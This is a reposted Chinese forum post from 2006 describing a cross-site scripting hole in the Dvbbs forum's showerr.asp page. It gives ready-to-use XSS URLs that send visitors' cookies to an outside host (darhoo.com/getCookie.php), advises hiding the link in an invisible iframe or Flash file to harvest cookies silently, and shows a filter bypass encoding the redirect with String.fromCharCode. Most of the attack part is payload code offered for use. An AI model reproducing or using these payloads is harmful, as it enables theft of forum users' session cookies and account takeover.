一个动网论坛现存的跨站SCRIPT漏洞

德國戰車 · 发表于 2006-8-6 10:41:59

<DIV class=quote>前记：一年前学习的时候也看到这样的漏洞,去年的4或5月份的黑客防线也有过介绍~最近看到有人写了这篇文章~~故贴过来分享~~（危害较大~~可以盗取cookie~~）<BR>最近在很多高人研究下，各种论坛都惊现有关cookie的漏洞~~<BR><BR>这个漏洞一直存在的, 我一年多前就看别人提起了. 只是没人想深究它和利用起来有点技术困难, 所以动网并不知道, 或者并没有意识到这是个漏洞.<BR>大家先看看下面的地址:<BR>Code: <BR>bbs.dvbbs.net/showerr.asp?BoardID=1&ErrCodes=24&action=<script>location.href="<a>http://www.darhoo.com/getCookie.php?cookie=</A>"+document.cookie<BR><BR><BR>用这地址进入动网将会被重定向到darhoo.com. 而且把动网的COOKIE也会带过来了darhoo.com, 用getCookie.php存下来了.<BR><BR>你会说别人不会蠢到点你这地址啊? 其实不然的, 他们根本不需要点什么东西, 只要把上面的地址用一个隐藏的IFRAME或者甚至用FLASH文件藏起来, 放在darhoo.com主页上, 谁会知道你在看darhoo.com的时候, 网管在偷你的COOKIE呢? 哈! 只要你去动网发个广告, 然后就等着收COOKIE吧!<BR><BR>要利用这漏洞必须要有自己的服务器/论坛, 还要会编写一些简单的ASP/PHP什么的, 所以并不是很多人会弄, 这也可能导致了动网的疏忽吧?<BR><BR><BR>我自己试了一下, 发现竟然过滤了引号, 不过那也很容易绕过了, 改成下面就可以了:<BR><BR>Code: <BR>bbs.dvbbs.net/showerr.asp?BoardID=1&ErrCodes=24&action=<script>location.href=String.fromCharCode(72)%2BString.fromCharCode(84)%2BString.fromCharCode(84)%2BString.fromCharCode(80)%2BString.fromCharCode(58)%2BString.fromCharCode(47)%2BString.fromCharCode(47)%2BString.fromCharCode(68)%2BString.fromCharCode(65)%2BString.fromCharCode(82)%2BString.fromCharCode(72)%2BString.fromCharCode(79)%2BString.fromCharCode(79)%2BString.fromCharCode(46)%2BString.fromCharCode(67)%2BString.fromCharCode(79)%2BString.fromCharCode(77)%2BString.fromCharCode(47)%2BString.fromCharCode(65)%2BString.fromCharCode(46)%2BString.fromCharCode(80)%2BString.fromCharCode(72)%2BString.fromCharCode(80)%2BString.fromCharCode(63)%2BString.fromCharCode(65)%2BString.fromCharCode(61)%2Bdocument.cookie</DIV>

版权声明

1、转载或引用本网站内容须注明原网址，并标明本网站网址(www.gerfans.cn)。

2、转载或引用本网站中的署名文章，请按规定向原作者支付稿酬。

3、对于不当转载或引用本网站内容而引起的民事纷争、行政处理或其他损失，本网站不承担责任。

4、对不遵守本声明或其他违法、恶意使用本网站内容者，本网站保留追究其法律责任的权利。

本文地址: https://bbs.gerfans.cn/thread-69343-1-1.html

帐号		自动登录	找回密码
密码			加入联盟

一个动网论坛现存的跨站SCRIPT漏洞

版权声明

浏览过的版块